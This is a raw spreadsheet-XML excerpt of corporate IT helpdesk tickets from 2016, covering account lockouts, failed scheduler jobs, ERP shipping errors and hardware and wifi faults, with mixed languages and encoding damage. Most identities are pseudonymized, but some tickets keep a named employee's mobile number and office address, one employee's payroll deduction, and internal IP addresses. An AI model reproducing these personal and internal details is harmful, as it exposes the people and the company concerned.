subject: tfw: ç­”å¤: new order--mm# 2694571 dmhpm045 / mm# 2695539 mb033_x000D_
importance: high_x000D_
_x000D_
hi,_x000D_
_x000D_
can you please advise why the group costs for mm#2694571 and 2695539 from plant_122 and plant_335 are different?_x000D_
taking mm#2694571 for example: @plant_122, group costs is $67.87, while @plant_335, group costs is $82.05? why? _x000D_
 _x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">no intercompany </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dumovtpj.ahgjsvoq@gmail.com
hi team,
we can not generate intercompany for delivery note 9168034926 the following error message appears, can you please
have a look:
[cid:image001.png@01d1f7b2.8e308980]
mit freundlichen grugermany / best </t>
  </si>
  <si>
    <t>dumovtpj ahgjsvoq</t>
  </si>
  <si>
    <t>need help in installing tess</t>
  </si>
  <si>
    <t>email-anzeige</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: trgqbeax.hfyzudql@gmail.com_x000D_
_x000D_
[cid:image001.png@01d1f7b0.223a83e0]_x000D_
_x000D_
_x000D_
leider ist das feld â€žvon" abhanden gekommen â˜¹_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
danke + viele grÃ¼ÃŸe_x000D_
trgqbeax hfyzudql_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen |  best </t>
  </si>
  <si>
    <t>not able to login to ess portal</t>
  </si>
  <si>
    <t>zpdist_programdnty not allowing to distribute against planned orders and production orders</t>
  </si>
  <si>
    <t>_x000D_
hello chandruhdty, ebi,_x000D_
_x000D_
iÂ´ve created an example in SID_1 for debugging an fixing. production order to receive is 226138271 // mm# 4289785._x000D_
the issue does not only appear in case the user tries to ship against a planned order but also when trying to ship against a production order._x000D_
_x000D_
shipping against planned orders:_x000D_
_x000D_
it looks like zpdist_programdnty does only allow to ship against planned orders in case the planned order finish date is due or past due (purple example in the screenshot). in case the planned order finish date is not due (red example) zpdist_programdnty does not allow to ship against the planned order._x000D_
_x000D_
the following things need to be changed:_x000D_
_x000D_
- zpdist_programdnty should allow to force the shipment against planned orders even though the planned order is not due (just like zpdist_programdnty does for stock transfer orders)_x000D_
- zpdist_programdnty should use the planned order start date rather than the planned order finish date to determine whether the planned order is due_x000D_
_x000D_
shipping against production orders:_x000D_
_x000D_
it looks like zpdist_programdnty does only allow to ship against production orders in case the basic finish date of the production order is due or past due (blue example). in case the basic finish date of the production order is not due (yellow example) zpdist_programdnty does not allow to ship against the production order._x000D_
_x000D_
the following things need to be changed:_x000D_
_x000D_
- zpdist_programdnty should allow to force the shipment against production orders even though the production order is not due (just like zpdist_programdnty does for stock transfer orders)_x000D_
- zpdist_programdnty should use the basic start date (which is already shown in the transaction) rather than the basic finish date to determine whether the production order is due</t>
  </si>
  <si>
    <t>windows system doesn't start</t>
  </si>
  <si>
    <t>wifi on big meetings is not stable in the meeting room</t>
  </si>
  <si>
    <t xml:space="preserve">if we have a meeting at switzerland with a lot of participants, like today, the wifi is not stable. the users will get interrupts frequently. i do not have the possibility to check how much users are connected to which ap for analyzing the problem. </t>
  </si>
  <si>
    <t>nicht gebuchte anzahlungsrechnungen company 5417 - vfx3 -</t>
  </si>
  <si>
    <t>siehe beigefÃ¼gte e-mail</t>
  </si>
  <si>
    <t>erp SID_34 account lock out issue</t>
  </si>
  <si>
    <t>laptop power issue</t>
  </si>
  <si>
    <t xml:space="preserve">laptop is not getting on </t>
  </si>
  <si>
    <t>yjxuqdto sivnzgok</t>
  </si>
  <si>
    <t>ç­”å¤: help for mm#4866474 24800776</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: windy.shi@company.com_x000D_
_x000D_
dearsï¼Œ_x000D_
how about the status now ?_x000D_
this shipment is urgent required._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">change "volunteer tracker" </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: fmjeaoih.ndyezlkb@gmail.com
hi all,
i would need two edits to be made to the volunteer tracker form
#wa=wsignin1.0
please add two fields beneath facilitator/contact person which should be named:
name of organization:
organization's address:
and please add at the very end:
please send the non- profit verification document to communication@company.com&lt;mailto:communication@company.com&gt;.
please note that the volunteer tracker should be accessible to all employees,
i set the permissions accordingly.
</t>
  </si>
  <si>
    <t xml:space="preserve">loaner laptops germany location germany   required </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ubiqcrvy.mxjcnqfs@gmail.com_x000D_
_x000D_
dear it-team,_x000D_
_x000D_
i would please need loaner laptops for our consultant from bank for the below period:_x000D_
_x000D_
12th september 2016 â€“ 15th september 2016                    hzptilsw wusdajqv / bank consultant_x000D_
_x000D_
19th september 2016 â€“ 20th september 2016                    jrilgbqu kbspjrod / bank consultant_x000D_
_x000D_
10th october 2016 â€“ 11th october 2016                              hzptilsw wusdajqv / bank consultant_x000D_
10th october 2016 â€“ 11th october 2016                              wpakylnj wdtsyuxg / bank consultant_x000D_
_x000D_
all three consultant should still have a valid erp and microsoft log in password. fyi - our bank consultant will do_x000D_
a huge update in september and october for our erp payment management and autobank tool._x000D_
_x000D_
could you please prepare the laptops accordingly and confirm if we will get the loaner laptops please._x000D_
i would pick them up on the mentioned dates above by steffen rÃ¶del._x000D_
_x000D_
if there is any problem please let me know._x000D_
_x000D_
many </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wqfzjycu.omleknjd@gmail.com_x000D_
_x000D_
hi deeghyupak,_x000D_
_x000D_
why are you running telephony_software upgrade on pc agvw8325504 when it is not used for telephony_software?_x000D_
_x000D_
with </t>
  </si>
  <si>
    <t>cannot access SID_1</t>
  </si>
  <si>
    <t xml:space="preserve">hello it,_x000D_
_x000D_
i cannot login to SID_1 anymore, see attachment._x000D_
please fix it for user id hannas and meixni_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>support fÃ¼r umzug \qvncizuf ueiybanz</t>
  </si>
  <si>
    <t>probleme mit EU_tool \obqridjk ugelctsz</t>
  </si>
  <si>
    <t>obqridjk ugelctsz</t>
  </si>
  <si>
    <t>virus found</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ynsqjehx.kqgrsawl@gmail.com_x000D_
_x000D_
hi it team,_x000D_
_x000D_
pls see how this can be removed? happened for the last 2 days._x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d1f7cd.2a3cf790]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number? 5018083414/00001_x000D_
_x000D_
what material or item number? 6471853_x000D_
_x000D_
what warehouse location? plant_108 to plant_168_x000D_
_x000D_
issue description / error message? "no message"</t>
  </si>
  <si>
    <t xml:space="preserve">windows account lock out </t>
  </si>
  <si>
    <t xml:space="preserve">windows account lockout </t>
  </si>
  <si>
    <t>gbaeniou svltmagu</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for xqkydoat.bveiyclr@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: tuesday, august 16, 2016 10:26 am
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: ragsbdhryu:request to reset microsoft online services password for xqkydoat.bveiyclr@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ xqkydoat.bveiyclr@gmail.com 
â€¢ first name: jagthyin bhughjdra 
â€¢ last name: babanlal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</si>
  <si>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problem mit start in outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ptuchwad.yzvrlcqa@gmail.com_x000D_
_x000D_
hallo_x000D_
_x000D_
kann auf rechner outlook nicht starten und crm synchronisiert stundenlang_x000D_
dadurch werden auch andere dinge geblockt ( engineering_tool z.b.)_x000D_
_x000D_
bitte um hilfe - sitze am rechner_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ssen_x000D_
-uwe schrÃ¶ck_x000D_
technische beratung und verkauf_x000D_
ptuchwad.yzvrlcqa@gmail.com&lt;mailto:ptuchwad.yzvrlcqa@gmail.com&gt;_x000D_
mobil 0175 4356 741&lt;tel:0175%204356%20741&gt;_x000D_
_x000D_
company deutschland gmbh / max-planck-straÃŸe 13 / d-61381 germany /www.company.com&lt;_x000D_
_x000D_
company deutschland gmbh_x000D_
geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, harald mÃ¤nnlein_x000D_
sitz der gesellschaft: germany/hgermany â€“ registergerirtcht: bad homburg/hgermany  hrb 7492_x000D_
_x000D_
_x000D_
_x000D_
_x000D_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
[#+company/posts&gt;  [_x000D_
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>po error language</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xjvubmlq.vyamhjip@gmail.com_x000D_
_x000D_
hello ,_x000D_
could you please help to check the reason of  po error language ._x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1f2f9.96a10ad0]_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>telephony_software software 2016 upgrade for user "laijuttr"</t>
  </si>
  <si>
    <t xml:space="preserve">i am not able to find the interaction desktop icon in my pc after installation.  even the old version got deleted.  please assist.  </t>
  </si>
  <si>
    <t>outlook spell check error - repeated issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjanhbde.owfkyjcp@gmail.com_x000D_
_x000D_
[cid:image004.png@01d1f7af.e02c9290][cid:image005.jpg@01d1f7af.e02c9290]_x000D_
_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2600</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2600 at 08/16/16 01:35:28</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2584</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2584 at 08/16/16 01:31:28</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2599</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2599 at 08/16/16 01:31:28</t>
  </si>
  <si>
    <t>jebpqcys njcrzhdq</t>
  </si>
  <si>
    <t>xmnvhfoa lkemcwrf</t>
  </si>
  <si>
    <t>recall: re:ticket_no1541701 - please reopen</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: duwvesim.cixqbmfr@gmail.com
narefgttndra shigthyuva would like to recall the message, "re:ticket_no1541701 - please reopen".
</t>
  </si>
  <si>
    <t>laptop volume is not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rvsbtxue.cdrwsymj@gmail.com_x000D_
_x000D_
hi_x000D_
_x000D_
my laptop dell precision m4700 volume has stopped working. not sure whether the problem is with any drivers. please help as i have to attend few skype sessions this week._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>rvsbtxue cdrwsymj</t>
  </si>
  <si>
    <t>outlook spell check not working - repeated issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjanhbde.owfkyjcp@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
pl. find the spell check error in the outlook._x000D_
this is a repeated error, time &amp; again observed._x000D_
_x000D_
need your attention &amp; permanent solution._x000D_
_x000D_
[cid:image002.jpg@01d1f79e.28cd4650]_x000D_
_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>dell battery failure.</t>
  </si>
  <si>
    <t>-kds sw11-services &lt;-kds.sw11-services@company.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> mm# 1876905</t>
  </si>
  <si>
    <t xml:space="preserve">from: -kds sw11-services _x000D_
sent: tuesday, august 16, 2016 7:12 am_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: rxoynvgi ntgdsehl; -kds sw11-services; johthryugftyson hu_x000D_
subject: fw: mm# 2987016_x000D_
_x000D_
hi it team_x000D_
_x000D_
_x000D_
please assist to create dn for the above mentioned mm. </t>
  </si>
  <si>
    <t xml:space="preserve">unable connect to engineering_tool </t>
  </si>
  <si>
    <t>abended job in job_scheduler: pp_EU_tool_netch_ap2</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: pp_EU_tool_netch_ap2 at 08/15/16 22:18:29</t>
  </si>
  <si>
    <t>warehouse_vendor export service on HostName_802  is showing down in monitoring_tool monitoring tool</t>
  </si>
  <si>
    <t>sipppr for help</t>
  </si>
  <si>
    <t xml:space="preserve">dear itï¼Œ
ä»¥ä¸‹æ˜¯sippprçš„å…¥å£é“¾æŽ¥ã€‚
æˆ‘ç™»å½•è¿›åŽ»åŽ pdfæ–‡ä»¶ä¸èƒ½ç¼–è¾‘ï¼Œå¸®å¿™çœ‹çœ‹æ˜¯ä»€ä¹ˆé—®é¢˜ï¼Œadobe reader ç‰ˆæœ¬éœ€è¦æ›´æ–°ï¼Ÿ
å¦‚ä¸‹ä¸¤ä¸ªé“¾æŽ¥ï¼š
best </t>
  </si>
  <si>
    <t>sraouxgh ehbomcvy</t>
  </si>
  <si>
    <t>r173 schneeberger cnc nr.20123 / wza</t>
  </si>
  <si>
    <t>programdntyme lassen sich teilweise nicht Ã¶ffnen, mal nach der festplatte schauen, _x000D_
bitte um erledigung durch m. himghtmelreich (EU_tool   rep. nr,:39788)</t>
  </si>
  <si>
    <t>user needed help to login to erp SID_34</t>
  </si>
  <si>
    <t>user needed help to login to erp SID_34._x000D_
-connected to the user system using teamviewer._x000D_
-help the user login to the erp SID_34._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: hr_tooldcvcgenratn at 08/15/16 17:02:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2827</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2827 at 08/15/16 16:07:32</t>
  </si>
  <si>
    <t>expense report will not submit</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ytqhfmwi.itnakpmc@gmail.com
my expense report will not submit. this is the 3rd expense report that i have not been able to submit. has required erp person/help desk to submit each time.
[cid:image003.jpg@01d1f706.cbb3aeb0]
michjnfyele l. jenhntyns
plant manager
ytqhfmwi.itnakpmc@gmail.com&lt;mailto:ytqhfmwi.itnakpmc@gmail.com&gt;
</t>
  </si>
  <si>
    <t>return 7112594470 is held up in worklfow under approval vnhaycfo smkpfjzv- as of 4/27/16</t>
  </si>
  <si>
    <t xml:space="preserve">vnhaycfo smkpfjzv is not with earthworks usa- customer order is being up held due to credit involved with this return. return has been received on 5/4/2016.  _x000D_
</t>
  </si>
  <si>
    <t>robhyertyj lee</t>
  </si>
  <si>
    <t>ron bell #21112660 has a 300 health savings acct deduction coming out of his paycheck yet he has elected zero.  can you please let me know why this is before the next u1 pay run.</t>
  </si>
  <si>
    <t>wrjaezov nouigrqb</t>
  </si>
  <si>
    <t>dell 7350: the system keeps going in to a loop of shutting down.-urgent</t>
  </si>
  <si>
    <t xml:space="preserve">dell 7350: the system keeps going in to a loop of shutting down.
-advised the user to restart the pc . not happening.
-service tag: 300811
-contact : 
-os: win 8.1
</t>
  </si>
  <si>
    <t>fhdgytup oxugrqeb</t>
  </si>
  <si>
    <t>adding purchasingupstreamsso members</t>
  </si>
  <si>
    <t xml:space="preserve">please add kigthuym whjtyulen (whjtlkn) and cqlehowf aosqelnr (shrghyadja) to the purchasingupstreamsso active directory (ad) group including a samaccountname in ad as all lowercase. </t>
  </si>
  <si>
    <t>mobile device</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ejsxqmia.cujvlrfq@gmail.com_x000D_
_x000D_
who do i need to contact?_x000D_
having battery life issues on my i phone loosing charge fast throughout the day is it something that i can have the battery replaced on or get a new phone?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ejsxqmia cujvlrfq</t>
  </si>
  <si>
    <t>how can i send a video to someone outside of company?</t>
  </si>
  <si>
    <t>name:aytjedki rucfxpla
language:
browser:microsoft internet explorer
email:aytjedki.rucfxpla@gmail.com
customer number:
telephone:
summary:how can i send a video to someone outside of company?
it is to large to attach to an email</t>
  </si>
  <si>
    <t xml:space="preserve">vip 2: meeting acceptance notification </t>
  </si>
  <si>
    <t xml:space="preserve">meeting acceptance notification </t>
  </si>
  <si>
    <t>unable to open .tif files</t>
  </si>
  <si>
    <t>wviaduqn nouqlwvz</t>
  </si>
  <si>
    <t>unable to login to the switch</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to the switch due to the memory issue as per syslog alarms. </t>
  </si>
  <si>
    <t>crm account and contact reassignment help.</t>
  </si>
  <si>
    <t xml:space="preserve">i would like to reassign accounts and contacts from myself to thomklmas (mitctdrh) ervin. 
phone: </t>
  </si>
  <si>
    <t>telephony_software phone system (interaction desktop) authentication process failure</t>
  </si>
  <si>
    <t>name:mitgckqf ewourgcx
language:
browser:microsoft internet explorer
email:mitgckqf.ewourgcx@gmail.com
customer number:
telephone:
summary:telephony_software phone system (interaction desktop) authentication process failure</t>
  </si>
  <si>
    <t>crm accrual posting not replicating from crm to ecc for cpp programdnty</t>
  </si>
  <si>
    <t xml:space="preserve">fund id and budget postings affected are below._x000D_
_x000D_
3770 211115402_x000D_
3771 211115403_x000D_
3772 211115404_x000D_
3773 211115405_x000D_
3774 211115406_x000D_
3775 211115407_x000D_
3776 211115408_x000D_
3777 211115409_x000D_
3778 211115400_x000D_
3779 211115511_x000D_
3780 211115512_x000D_
3781 211115513_x000D_
3782 211115514_x000D_
3783 211115515_x000D_
3784 211115516_x000D_
3785 211115517_x000D_
3786 211115518_x000D_
3787 211115519_x000D_
3788 211115510_x000D_
</t>
  </si>
  <si>
    <t>access to database</t>
  </si>
  <si>
    <t>name:mikhghytr karaffa
language:
browser:microsoft internet explorer
email:vfrdxtqw.jfbmsenz@gmail.com
customer number:
telephone:
summary:please usa me access to the dunham and bradstreet data base.</t>
  </si>
  <si>
    <t>drive encryption attention needed</t>
  </si>
  <si>
    <t>HostName_1169.company.com.is connected? is not connected</t>
  </si>
  <si>
    <t>received reporting_tool alert at 1:57 pm on 8/15 et HostName_1169.company.com.is connected? is not connected</t>
  </si>
  <si>
    <t>password reset on ess portal</t>
  </si>
  <si>
    <t>expense report not reaching manager</t>
  </si>
  <si>
    <t>znqcljxt azvoespk</t>
  </si>
  <si>
    <t>pc will not boot.  rqxw8516900, beshryu screen no post.  has been slow to start for a while.</t>
  </si>
  <si>
    <t>pmwuotcq oiuybwzg</t>
  </si>
  <si>
    <t>xerox copier in usa office prtSID_69369 has a paper feeder fault, will not copy.</t>
  </si>
  <si>
    <t xml:space="preserve">from: jghjimdghty bfhjtuiwell 
sent: monday, august 15, 2016 8:26 pm
to: nwfodmhc exurcwkm
subject: amar re: jghjimdghty bfhjtuiwell , your windows password is expiring soon!!
importance: high
hi it â€“ i changed my vpn password this morning when prompted and then in erp and outlook but when i go to change it per the password_management_tool pw software below â€“ the password_management_tool pw won't accept my self-service login passwords (old and new) or my email address.
</t>
  </si>
  <si>
    <t>account locked out and password reset request.</t>
  </si>
  <si>
    <t>inermfhs bxijkepv</t>
  </si>
  <si>
    <t>ctxribfl hiwckyrn</t>
  </si>
  <si>
    <t>unable to connect to any network from laptop</t>
  </si>
  <si>
    <t>icezpqar zbpcjfdh</t>
  </si>
  <si>
    <t>create wi-fi passwords for ibm team onsite at usa for a week</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
please create wi-fi passwords for all the tem members below who will be in usa, pa from 8-16-16 to 8-19-16. </t>
  </si>
  <si>
    <t>unable to open outlook and ess due to bad password</t>
  </si>
  <si>
    <t>unable to access emails</t>
  </si>
  <si>
    <t>xyiktbla gralexfc</t>
  </si>
  <si>
    <t>account locked out on erp SID_34</t>
  </si>
  <si>
    <t>ygowsqif mkaypzbl</t>
  </si>
  <si>
    <t>access to engineering tool</t>
  </si>
  <si>
    <t>giatndok wlzxridu</t>
  </si>
  <si>
    <t>global it-germany-erp-print of csi in vl02n does not works!</t>
  </si>
  <si>
    <t>hello dear all,_x000D_
i have tried to print the csi in the erp-vl02n for a 2nd time. _x000D_
the message what i have got was: oops! internet explorer could not connect to HostName_523.company.company.com:20010! if anybody could help me - that would be very great. wbr-petrghada :-)</t>
  </si>
  <si>
    <t>HostName_973 (hr_tool tax_interface app-qa): average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)</t>
  </si>
  <si>
    <t>it-germany-h. kruse / as-400-passwortÃ¤nderung fehlgeschlagen</t>
  </si>
  <si>
    <t>hallo frthdyui,_x000D_
passwortÃ¤nderung in der as-400 hat nicht geklappt. bitte um deine hilfe. lieben dank im voraus-gruÃŸ petrghada :-)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zfburidj.jmilguev@gmail.com_x000D_
_x000D_
hi there,_x000D_
_x000D_
can you please give me access to erp. i cannot log on to it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1953b at 08/15/16 10:59:31</t>
  </si>
  <si>
    <t>vip 2 : battery seems to be dead : latitude e7250</t>
  </si>
  <si>
    <t xml:space="preserve">vip 2 : battery seems to be dead : latitude e7250
summary:dell laptop battery light flashing orange. laptop will not work without connection to power cord. battery seems to be dead.
</t>
  </si>
  <si>
    <t>nyrjkctu tbhkenlo</t>
  </si>
  <si>
    <t>restart a service on the lhqSID_1854 server</t>
  </si>
  <si>
    <t>restart a service on the lhqSID_1854 server
phone: -5508</t>
  </si>
  <si>
    <t>password issue</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 password reset and unlock request </t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 password reset and unlock request  </t>
  </si>
  <si>
    <t>czenblfs ochjndta</t>
  </si>
  <si>
    <t>unable to access HostName_1274</t>
  </si>
  <si>
    <t>ticket update query on ticket inc1541161 : urgqkinl zpcokgbj</t>
  </si>
  <si>
    <t>shop_floor_app record error</t>
  </si>
  <si>
    <t>operator reinaldo albrecht, second shift machine ewag rs15, grinding process, pcd cell, cannot record correctly his work data on shop_floor_app there is a few days. the records of a day are extended to the next as if they had not been closed.</t>
  </si>
  <si>
    <t>engineering_tool_dwnload prb</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rmdtqfxa.fwpnqdxo@gmail.com_x000D_
_x000D_
hello it,_x000D_
_x000D_
when i tried to download engineering_tool to my desktop , it is showing me this error._x000D_
please fix this issue:_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1f728.ecdcf070]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>not possible to login due to a locked account</t>
  </si>
  <si>
    <t>qufjnslk bvtfrwnu</t>
  </si>
  <si>
    <t xml:space="preserve">cant complete quote number </t>
  </si>
  <si>
    <t xml:space="preserve">cant complete quote number _x000D_
3116216659 get error massage_x000D_
"line item -&gt; 000010_x000D_
entered brand is not listed, enter a valid brand for line item" </t>
  </si>
  <si>
    <t>zevqkaxh gkmohwdb</t>
  </si>
  <si>
    <t>netweaver bussiness client does not open.</t>
  </si>
  <si>
    <t>hr_tool portal is not working.</t>
  </si>
  <si>
    <t>dmxqjpay oxuwmbrt</t>
  </si>
  <si>
    <t>vip2 : delegation issue.</t>
  </si>
  <si>
    <t>vip 2 : telephone:412
summary:still trying to get an issue resolved with outlook. i am tomashtgd mchectg's new assistant. he gave me editor permission for his email, calendar, etc. when i try to view his email in outlook, i get this error message "cannot display the folder. microsoft outlook cannot access the specified folder location." i have to manually open his email account each time which is not going to work. i seem to be able to view his email in owa. but i want to use outlook 2013.</t>
  </si>
  <si>
    <t>the clocks at the bottom of the hub home page seem to be missing</t>
  </si>
  <si>
    <t>i tried in both ie and mozilla.</t>
  </si>
  <si>
    <t>problem with speaker</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
i'm having a problem with the speaker on my laptop. i can hear on my headset but not my earbuds or speakers. please advise
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t>unable to reset the password</t>
  </si>
  <si>
    <t xml:space="preserve">unable to reset the password_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">call from debgrtybie savgrtyuille inc1541588 : to cancel ticket </t>
  </si>
  <si>
    <t>immediate restoration of t drive files required</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: crkdjbot.qiztrxne@gmail.com
hello,
t:\HostName_768\teams\corporate governance and  t:\HostName_768\teams\proxyâ€¦ these folders were deleted by an it helpdesk employee over the weekend.  we need immediate restoration back to friday so these folders and all of the files contained within are restored.
this is a priority request.  please respond within the hour.
best,
debgrtybie savgrtyuille
sr. corporate paralegal
company inc.
crkdjbot.qiztrxne@gmail.com&lt;mailto:crkdjbot.qiztrxne@gmail.com&gt;
</t>
  </si>
  <si>
    <t>christgrytoph called to check if account has been disabled</t>
  </si>
  <si>
    <t>need help in resetting erp password and unlocking all accounts</t>
  </si>
  <si>
    <t>duoabqim vplrsbua</t>
  </si>
  <si>
    <t>account expired for cyxieuwk rekwlqmu 2nd july 2016</t>
  </si>
  <si>
    <t>account expired for cyxieuwk rekwlqmu 2nd july 2016
informed user that we need email from hr that account needs to be enabled.
 : account disabled.</t>
  </si>
  <si>
    <t>inc1541444 -sao-palo-2960-switch-i(45.25.35.049) is down since 8:00 am on 08/14 et</t>
  </si>
  <si>
    <t xml:space="preserve">hi uidgt/jean,_x000D_
_x000D_
we are observing one of the switch sao-palo-2960-switch-i(45.25.35.049) is down since 8:00 am on 08/14 et. please check for the power status /cable connections for this switch and revert._x000D_
_x000D_
note: all devices came active after the planned power maintenance as per chg1144678 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>password_management_tool password manager brings an error while password change attempts</t>
  </si>
  <si>
    <t>collaboration_platform online is not opening.</t>
  </si>
  <si>
    <t>collaboration_platform online is not opening._x000D_
_x000D_
error : diese seite kann nicht angezeigt warden.</t>
  </si>
  <si>
    <t>outlook (nicht lizensiertes produkt)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vnsmwqhb.ogtpenjd@gmail.com_x000D_
_x000D_
hallo help,_x000D_
_x000D_
ms office produkte zeigen folgende fehlermeldung:_x000D_
[cid:image001.png@01d1f6f8.87161a30]_x000D_
_x000D_
gruÃŸ / </t>
  </si>
  <si>
    <t>vnsmwqhb ogtpenjd</t>
  </si>
  <si>
    <t>reset the password for nvawmlch ubyjolnc on erp / production / erp</t>
  </si>
  <si>
    <t>wvdxnkhf jirecvta locked out himself from windows and needs a password reset</t>
  </si>
  <si>
    <t>user id : owenghyga
he was locked out while using wifi at fÃ¼rth location</t>
  </si>
  <si>
    <t>unable to boot up computer</t>
  </si>
  <si>
    <t>unable to boot up computer. earlier there was a issue with blue screen.  _x000D_
_x000D_
_x000D_
_x000D_
computer name: _x000D_
service tag : f1gvv32_x000D_
_x000D_
ruf nummer : 015sartlgeo lhqksbdx21 60543</t>
  </si>
  <si>
    <t>wegxsmbq bvfnmjcd</t>
  </si>
  <si>
    <t xml:space="preserve">skype issue ; ms office crashing </t>
  </si>
  <si>
    <t>crm  -  unsafe web-side</t>
  </si>
  <si>
    <t>after pw-update i've tried to lo log-on to crm.
i received the following pop-up: 
  soll google chrome ihr passwort fÃ¼r diese webside speichern?  skotthyutc
i've skiped that message.
than i went to sales &amp; markhtyeting. after clicking on crm (english languague) i left the save web. 
  i went to: 
is that the side we would like to use?
i received the following pop-up:
  soll google chrome ihr passwort fÃ¼r diese webside speichern?
do we want google to save our pws?</t>
  </si>
  <si>
    <t xml:space="preserve">unlock ad account </t>
  </si>
  <si>
    <t>qsontkux lkfnesoc</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vhlepcta.lqbgcxpt@gmail.com_x000D_
_x000D_
hello team,_x000D_
abdhtyu user's account is blocked, can you please help?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">wifi slow speed-company (apac) </t>
  </si>
  <si>
    <t xml:space="preserve">it team,
please kindly check internet for us. right now unable to work. ip data as below;
copyright (c) 2009 microsoft corporation.  all rights reserved.
c:\users\vvghychamc&gt;tracert 8.8.8.8
trghwyng route to google-public-dns-a.google.com [8.8.8.8]
over a maximum of 30 hops:
  1     2 ms     2 ms     2 ms  company-ap-tha-apac-dmvpn-2811-rtr01.company.com [10
.44.18.2]
  2   151 ms   150 ms   152 ms  att-singapore-3825-vpn-rtr-2.company.com [10.44.6.3
]
  3   200 ms   200 ms   201 ms  10.44.1.114
  4   152 ms   153 ms   152 ms  122.248.132.50
  5   374 ms   211 ms   212 ms  mdf002c7613r0002-tge-12-2.sng1.attens.net [32.60
.32.181]
  6   211 ms   212 ms   207 ms  32.114.188.5
  7   218 ms   217 ms   216 ms  32.119.97.150
  8   326 ms   277 ms   272 ms  as15169.ix.jpix.ad.jp [210.171.224.96]
  9   220 ms   224 ms   223 ms  72.14.234.23
10   221 ms   220 ms   220 ms  209.85.255.229
11   216 ms   217 ms   216 ms  google-public-dns-a.google.com [8.8.8.8]
trace complete.
c:\users\vvghychamc&gt;
from: przndfbo pldqbhtn 
sent: monday, august 15, 2016 12:59 pm
to: corpcare@trueinternet.co.th; pichayapuk (pichayapuk_num@trueinternet.co.th); gdhyrts muggftyali 
cc: izwtdnfq xptuoaid
subject: wifi slow speed-company (apac) 
dear k.pichayapuk,
